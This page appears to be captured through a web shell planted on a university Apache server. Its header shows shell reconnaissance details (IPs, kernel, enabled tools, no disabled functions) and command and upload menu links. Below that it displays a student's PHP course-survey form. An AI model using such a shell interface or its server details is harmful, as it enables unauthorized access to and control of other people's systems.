Server IP : 172.16.15.8 / Your IP : 3.149.24.145 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/wakeating/../tasantos/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- File Name: hw9survey.php --> <TITLE>Insert a Record</TITLE> <body background="http://bob.pinkmirrors.com/wallpapers/squares.png";> <font face=arial size=4 color=330099> <center> <FORM action="finalinsert.php" method=post> <hr color=330099> <font size=6>Welcome to the Computer Science Course Survey</font><br> <HR color=330099> <FORM action=finaldisplay.php method=post> <br> <pre>Select your gender:<br> <input type=radio name=gender value= Male> Male <input type=radio name=gender value=Female> Female </pre> Select your grade: <pre><input type=radio name=grade value= Freshman> Freshman <input type=radio name=grade value= Sophomore> Sophomore <input type=radio name=grade value= Junior> Junior <input type=radio name=grade value= Senior> Senior </pre> Input your course number: <input type=text size=15 name=course><br> <br> <hr width =50%> <font size=5> Now lets take the survey!</font> <hr width = 50%> <br><br> 1. The instructor was willing to help outside of class. <pre> <input type=radio name=question1 value=2 checked> Strongly Agree <input type=radio name=question1 value=1> Agree <input type=radio name=question1 value=0> Disagree </pre> 2. The instructor graded fairly. <pre> <input type=radio name=question2 value=2 checked> Strongly Agree <input type=radio name=question2 value=1> Agree <input type=radio name=question2 value=0> Disagree </pre> 3. The syllabus/assignments for this course were easy to understand. <pre> <input type=radio name=question3 value=2 checked> Strongly Agree <input type=radio name=question3 value=1> Agree <input type=radio name=question3 value=0> Disagree </pre> 4. There was a reasonable amount of work required for this course. <pre> <input type=radio name=question4 value=2 checked> Srongly Agree <input type=radio name=question4 value=1> Agree <input type=radio name=question4 value=0> Disagree </pre> 5. Overall you were satisfied with this course. <pre> <input type=radio name=question5 value=2 checked> Strongly Agree <input type=radio name=question5 value=1> Agree <input type=radio name=question5 value=0> Disagree </pre> <br> <input type=submit value="Click to Submit"> <input type=reset value="Clear and Restart"> <br> <br> <br> <A HREF="final.html">Back To Homepage</A>